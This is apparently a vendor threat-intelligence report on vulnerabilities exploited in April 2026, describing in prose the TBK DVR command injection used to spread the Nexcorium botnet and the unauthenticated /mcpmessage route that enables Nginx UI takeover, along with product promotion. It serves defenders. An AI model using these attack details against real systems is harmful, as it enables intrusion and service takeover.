April 2026 CVE Landscape

In April 2026, Insikt Group® identified 37 high-impact vulnerabilities that should be prioritized for remediation, 35 of which had a Very Critical Recorded Future Risk Score. This represents a 19% increase from last month.

31 of the 37 were included in the US Cybersecurity and Infrastructure Security Agency (CISA)’s Known Exploited Vulnerabilities (KEV) catalog, and six were surfaced only through honeypot data. Those six CVEs associated with honeypots are available only to Recorded Future customers.

Those 37 vulnerabilities affected products from 23 vendors. Microsoft accounted for approximately 22%, while the remaining exposure was concentrated across a range of enterprise-facing vendors, particularly security and systems management tools, collaboration and server platforms, developer and application-delivery software, remote support tools, and network-edge infrastructure.

In April, Insikt Group created Nuclei templates for the missing authentication vulnerabilities in Nginx UI (CVE-2026-33032) and Marimo (CVE-2026-39987). These Nuclei templates are available to Recorded Future customers.

Quick Reference: April 2026 Vulnerability Table

All 31 vulnerabilities below were actively exploited in April 2026. This table does not include the 6 CVEs associated with honeypot activity. The table below also provides examples of public PoCs identified by Insikt Group®. These PoCs were not tested for accuracy or efficacy. Vulnerability management teams should exercise caution and verify the validity of PoCs before testing.

Table 1: List of vulnerabilities that were actively exploited in April based on Recorded Future data (excluding honeypot-sourced CVEs).

Key Trends: March 2026

• In April 2026, seven of the 37 vulnerabilities in this report were linked to ransomware activity.
  • Six are explicitly tied to Storm-1175's Medusa ransomware operations.
  • CISA has also linked CVE-2026-41940 with known ransomware use (Sorry Ransomware, per open source reporting).
  • Additionally, threat actors exploited CVE-2024-3721 in TBK DVR devices to deliver the Nexcorium botnet.
• Sixteen of the 37 vulnerabilities enabled remote code execution (RCE), affecting products from twelve vendors: Adobe, Apache, D-Link, Fortinet, Google, Ivanti, Kentico, Marimo, Microsoft, SimpleHelp, TrueConf, and Wazuh.
• Insikt Group® identified public proof-of-concept (PoC) exploits for 24 of the 37 vulnerabilities in this report.
• The most commonly observed flaws this month were CWE-22 (Path Traversal), followed by CWE-94 (Code Injection), CWE-20 (Improper Input Validation), and CWE-306 (Missing Authentication for Critical Function).
• Three of the 37 vulnerabilities are at least five years old, with the oldest approximately seventeen years old, reinforcing how attackers continue to exploit long-known weaknesses in environments where patching has lagged. Additionally, the fastest observed time from a vulnerability’s public disclosure to exploitation was two days.

Exploitation Analysis

This section highlights some of the highest-impact, actively exploited vulnerabilities this month, specifically those linked to known threat actor campaigns, that have public PoC exploits available, or for which Insikt Group® has created Nuclei templates to detect the vulnerability. Vulnerabilities with no meaningful public technical detail are summarized in the disclosures table only.

Threat Actors Exploit TBK DVR Vulnerability (CVE-2024-3721) to Deliver Nexcorium

On April 17, 2026, FortiGuard Labs (@FortiGuardLabs on X, formerly known as Twitter), associated with Fortinet (@Fortinet), published a technical analysis detailing a campaign that exploits TBK Digital Video Recorder (DVR) devices to deliver Nexcorium, a Mirai-based botnet. A TBK DVR device is a surveillance system recorder that captures, stores, and allows playback or remote viewing of video from connected security cameras. According to FortiGuard Labs, Nexcorium targets TBK DVR-4104 and DVR-4216 systems by exploiting CVE-2024-3721, an operating system (OS) command injection vulnerability that allows remote threat actors to execute arbitrary system commands.

Based on FortiGuard Labs’ analysis, the campaign begins with the exploitation of CVE-2024-3721 through crafted requests that manipulate the mdb and mdc arguments in TBK DVR devices, which delivers a downloader script named dvr. The exploit includes the HTTP header X-Hacked-By with the value Nexus Team - Exploited By Erratic. The dvr script retrieves Nexcorium binaries with filenames beginning with nexuscorp for architectures such as ARM, MIPS R3000, and x86-64. The dvr script then sets the Nexcorium binaries’ permissions to 777, and executes them with an argument that identifies the compromised system.

Further technical details associated with this activity, including sample analysis and IoCs, are available to Recorded Future customers via Insikt Group reporting.

Recorded Future customers can also access Malware Intelligence queries, which surface samples that connect to known network indicators.

Figure 1: Vulnerability Intelligence Card® for CVE-2024-3721 in Recorded Future (Source: Recorded Future)

Insikt® Validated TTP: Using Nuclei to Detect CVE-2026-33032, an Actively Exploited Missing Authentication Vulnerability Affecting Nginx UI

On March 28, 2026, GitHub user Jacky (0xJacky) published an advisory in the Nginx UI repository detailing CVE-2026-33032 and a PoC exploit. CVE-2026-33032 is a Missing Authentication for Critical Function vulnerability affecting all versions of Nginx UI. Nginx UI is a web-based management interface for Nginx that lets administrators view status, create and modify configuration files, and control operations such as reloads and restarts. Exploiting CVE-2026-33032 allows an unauthenticated remote threat actor to restart, create, modify, or delete configuration files, and trigger configuration reloads, resulting in a complete Nginx service takeover.

According to Recorded Future data, active exploitation of CVE-2026-33032 was observed on April 1, 2026, on deception technology honeypots, four days after Nginx’s advisory and published PoC. Public version metadata for CVE-2026-33032 is inconsistent. The GitHub advisory currently lists the affected range as “all versions” with no patched version, and downstream records such as NVD/OSV have reflected broader affected ranges. However, the vulnerability author’s later technical analysis states that those ranges are incorrect, that version 2.3.3 is the last vulnerable version, and that version 2.3.4 contains the fix. Accordingly, we assess the most accurate affected range to be version 2.3.3 and earlier, while noting that some third-party databases may still show broader ranges due to discrepancies in advisory metadata.

The vulnerability resides in Nginx UI's MCP router and IP allowlist middleware. The /mcp endpoint enforces both IP allowlisting and authentication, while the /mcpmessage endpoint enforces IP allowlisting. An empty default IP allowlist triggers fail-open behavior in the middleware, allowing unauthenticated requests to /mcpmessage to reach the same mcp. ServeHTTP() handler that processes all MCP tool invocations. As a result, an unauthenticated remote threat actor with network access can access privileged MCP functions via /mcpmessage and take over Nginx management operations without credentials.

Based on the advisory, the PoC requires an operator-supplied JSON-RPC request that specifies the MCP tool to invoke and its arguments. The example includes the JSON-RPC method tools/call, the tool name nginxconfigadd, and five tool arguments: name, content, basedir, overwrite, and syncnodeids. Once provided, the PoC sends the crafted request to /mcpmessage. The service accepts the request without an Authorization header under an IP allowlist check with an empty default allow-all list. The service forwards the request to mcp.ServeHTTP(), which dispatches the selected MCP tool. In the example, nginxconfigadd writes a new nginx configuration file to the supplied filename inside the chosen base directory. After writing the file, nginxconfigadd triggers an immediate nginx reload.

The advisory states that a successful exploit can give an operator control over nginx configuration management and traffic handling. The advisory describes a complete takeover of the nginx service, including the ability to create, modify, or delete configuration files within the config directory and trigger immediate reload or restart actions. The advisory also describes traffic interception, service disruption due to invalid configuration changes, configuration exfiltration via readable nginx config files, and credential harvesting via injected logging directives that capture Authorization headers to enable escalation to the REST API.

Insikt Group® created a Nuclei template to detect CVE-2026-33032, which is available to Recorded Future customers. At the time of writing, there were 3,002 exposed Nginx UI instances on Shodan, with the majority geolocated in China, the US, Indonesia, Germany, and Hong Kong. However, not all of these are specifically vulnerable, as their specific versions are unknown.

Figure 2: Risk Rules History from Vulnerability Intelligence Card® for CVE-2026-33032 in Recorded Future (Source: Recorded Future)

Take Action

Timely and relevant information on vulnerabilities in your environment and that of your vendors and suppliers is critical for reducing risk. Find out how Recorded Future can support your team by increasing visibility, improving efficiency, and enabling confident decisions.

Vulnerability Intelligence – Prioritize vulnerabilities based on the likelihood of exploitation – not just the severity. Easily understand the risk of exploitation alongside severity, and real-time contextualized intelligence to help you quickly make confident decisions, patch what matters, and prevent attacks.

Attack Surface Intelligence – Identify internet-facing assets vulnerable to a specific CVE. Attack Surface Intelligence provides an outside-in view of your organization to help you actively discover, prioritize, and respond to unknown, vulnerable, or misconfigured assets.

Third-Party Intelligence – Gain an external view of the security posture of your vendors and partners. Eliminate time-consuming research and vendor communication cycles with the ability to promptly assess vulnerabilities in their internet-facing systems.

Insikt Group® – Receive access to exclusive reports on new vulnerabilities and trends from Recorded Future’s team of experts, the Insikt Group®. Download Nuclei templates created by Insikt Group® for select CVEs to test potentially vulnerable instances.

Recorded Future Professional Services – Work with our Professional Services team on a Vulnerability Analysis Engagement. Designed to equip your team with advanced strategies for identifying, prioritizing, and mitigating threats effectively, this program delves into technologies and operations essential for a successful vulnerability management program. (Learn more about how our Professional Services team can help your elevate your team by watching our recent Vulnerability Prioritization Workshop)

About Iniskt Group®

Recorded Future’s Insikt Group®, the company’s threat research division, comprises analysts and security researchers with deep government, law enforcement, military, and intelligence agency experience. Their mission is to produce intelligence that reduces risk for customers, enables tangible outcomes, and prevents business disruption.